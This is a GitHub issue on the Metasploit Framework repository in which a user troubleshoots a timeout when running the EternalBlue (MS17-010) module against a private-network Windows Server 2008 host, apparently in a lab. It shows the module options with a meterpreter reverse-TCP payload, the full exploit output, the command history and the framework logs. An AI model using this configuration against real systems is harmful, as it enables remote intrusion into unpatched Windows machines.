rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

ms17_010_eternalblue Rex::ConnectionTimeout: The connection timed out #14505

Closed faughnn closed 3 years ago

faughnn commented 3 years ago

Steps to reproduce

How'd you do it?

  1. I set the following options

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         192.168.0.200    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass        kali             no        (Optional) The password for the specified username
   SMBUser        Administrator    no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.0.15     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
```

  2. I can ping the server. Firewalls are down. I can netcat the server. I'm at a loss.

Were you following a specific guide/tutorial or reading documentation?

https://www.hackingarticles.in/smb-penetration-testing-port-445/

Expected behavior

What should happen?

Connection should be established

Current behavior

What happens instead?

Timeout

```
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.15:4444 
[*] 192.168.0.200:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.200:445     - Host is likely VULNERABLE to MS17-010! - Windows Server (R) 2008 Standard 6002 Service Pack 2 x64 (64-bit)
[*] 192.168.0.200:445     - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.200:445 - Connecting to target for exploitation.
[+] 192.168.0.200:445 - Connection established for exploitation.
[+] 192.168.0.200:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.200:445 - CORE raw buffer dump (52 bytes)
[*] 192.168.0.200:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 28  Windows Server (
[*] 192.168.0.200:445 - 0x00000010  52 29 20 32 30 30 38 20 53 74 61 6e 64 61 72 64  R) 2008 Standard
[*] 192.168.0.200:445 - 0x00000020  20 36 30 30 32 20 53 65 72 76 69 63 65 20 50 61   6002 Service Pa
[*] 192.168.0.200:445 - 0x00000030  63 6b 20 32                                      ck 2            
[+] 192.168.0.200:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.200:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.200:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.200:445 - Starting non-paged pool grooming
[+] 192.168.0.200:445 - Sending SMBv2 buffers
[+] 192.168.0.200:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.200:445 - Sending final SMBv2 buffers.
[*] 192.168.0.200:445 - Sending last fragment of exploit packet!
[*] 192.168.0.200:445 - Receiving response from exploit packet
[+] 192.168.0.200:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.200:445 - Sending egg to corrupted connection.
[*] 192.168.0.200:445 - Triggering free of corrupted buffer.
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 192.168.0.200:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 192.168.0.200:445 - Connecting to target for exploitation.
[-] 192.168.0.200:445 - Rex::ConnectionTimeout: The connection timed out (192.168.0.200:445).
[*] Exploit completed, but no session was created.
```

Metasploit version

```
Framework: 6.0.18-dev
Console  : 6.0.18-dev
```

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

```
[framework/ui/console]
ActiveModule=exploit/windows/smb/ms17_010_eternalblue

[windows/smb/ms17_010_eternalblue]
EXITFUNC=thread
CheckModule=auxiliary/scanner/smb/smb_ms17_010
WfsDelay=5
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=192.168.0.200
RPORT=445
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
DCERPC::max_frag_size=4096
DCERPC::fake_bind_multi=true
DCERPC::fake_bind_multi_prepend=0
DCERPC::fake_bind_multi_append=0
DCERPC::smb_pipeio=rw
DCERPC::ReadTimeout=10
VERIFY_TARGET=true
VERIFY_ARCH=true
SMBUser=Administrator
SMBPass=kali
SMBDomain=.
ForceExploit=false
ProcessName=spoolsv.exe
MaxExploitAttempts=3
GroomAllocations=12
GroomDelta=5
PAYLOAD=windows/x64/meterpreter/reverse_tcp
LHOST=192.168.0.15
LPORT=4444
ReverseListenerBindPort=
ReverseAllowProxy=false
ReverseListenerComm=
ReverseListenerBindAddress=
ReverseListenerThreaded=false
StagerRetryCount=10
StagerRetryWait=5
PingbackRetries=0
PingbackSleep=30
PayloadUUIDSeed=
PayloadUUIDRaw=
PayloadUUIDName=
PayloadUUIDTracking=false
EnableStageEncoding=false
StageEncoder=
StageEncoderSaveRegisters=
StageEncodingFallback=true
PrependMigrate=false
PrependMigrateProc=
AutoLoadStdapi=true
AutoVerifySession=true
AutoVerifySessionTimeout=30
InitialAutoRunScript=
AutoRunScript=
AutoSystemInfo=true
EnableUnicodeEncoding=false
HandlerSSLCert=
SessionRetryTotal=3600
SessionRetryWait=10
SessionExpirationTimeout=604800
SessionCommunicationTimeout=300
PayloadProcessCommandLine=
AutoUnhookProcess=false
smb=pass kali
loglevel=3
```

History

The following commands were run during the session and before this issue occurred:

```
207 use exploit/windows/smb/ms17_010_eternalblue
208 show options
209 set rhosts 192.168.0.200
210 set smb pass kali
211 set smbpass kali
212 set smbuser Administrator
213 show options
214 run
215 show options
216 version
217 set loglevel 3
218 run
219 debug
```

Framework Errors

The following framework errors occurred before the issue occurred:

```
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 13:13:34] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue): Interrupt - Interrupt
[12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
```

Web Service Errors

The following web service errors occurred before the issue occurred:

```
msf-ws.log does not exist.
```

Framework Logs

The following framework logs were recorded before the issue occurred:

```
[12/12/2020 12:47:39] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 12:47:39] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 12:49:24] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue) - Msf::NoEncodersSucceededError windows/x64/shell/reverse_tcp: All encoders failed to encode.
[12/12/2020 12:49:37] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue) - Msf::NoEncodersSucceededError windows/meterpreter/reverse_tcp: All encoders failed to encode.
[12/12/2020 12:49:46] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:49:46] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:49:46] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 12:49:46] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 12:49:54] [e(0)] core: Failed to connect to the database: No database YAML file
[12/12/2020 12:49:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:49:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:49:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 12:49:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 12:50:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:50:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 12:50:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 12:50:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 12:51:23] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 12:51:23] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 12:55:05] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 12:55:05] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 12:56:34] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 12:57:36] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 12:57:36] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:04:56] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:04:56] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:04:56] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 13:04:56] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 13:04:58] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:04:58] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:06:42] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:06:42] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 13:08:31] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 13:11:52] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:11:52] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:13:34] [e(0)] core: Exploit failed (windows/smb/ms17_010_eternalblue): Interrupt - Interrupt
[12/12/2020 13:26:39] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:26:39] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[12/12/2020 13:31:18] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[12/12/2020 13:33:47] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:33:47] [d(0)] core: Negotiated SMB version: SMB1
[12/12/2020 13:39:24] [d(0)] core: SMB version(s) to negotiate: [1]
[12/12/2020 13:39:24] [d(0)] core: Negotiated SMB version: SMB1
```

Web Service Logs

The following web service logs were recorded before the issue occurred:

```
msf-ws.log does not exist.
```

Version/Install

The versions and install method of your Metasploit setup:

```
Framework: 6.0.18-dev
Ruby: ruby 2.7.2p137 (2020-10-01 revision 5445e04352) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify
```

faughnn commented 3 years ago

I see in the logs that I didn't have my db set up

[12/12/2020 13:31:13] [e(0)] core: Failed to connect to the database: No database YAML file

MySQL666xxxxxxxx commented 1 month ago

I also have the timeout problem.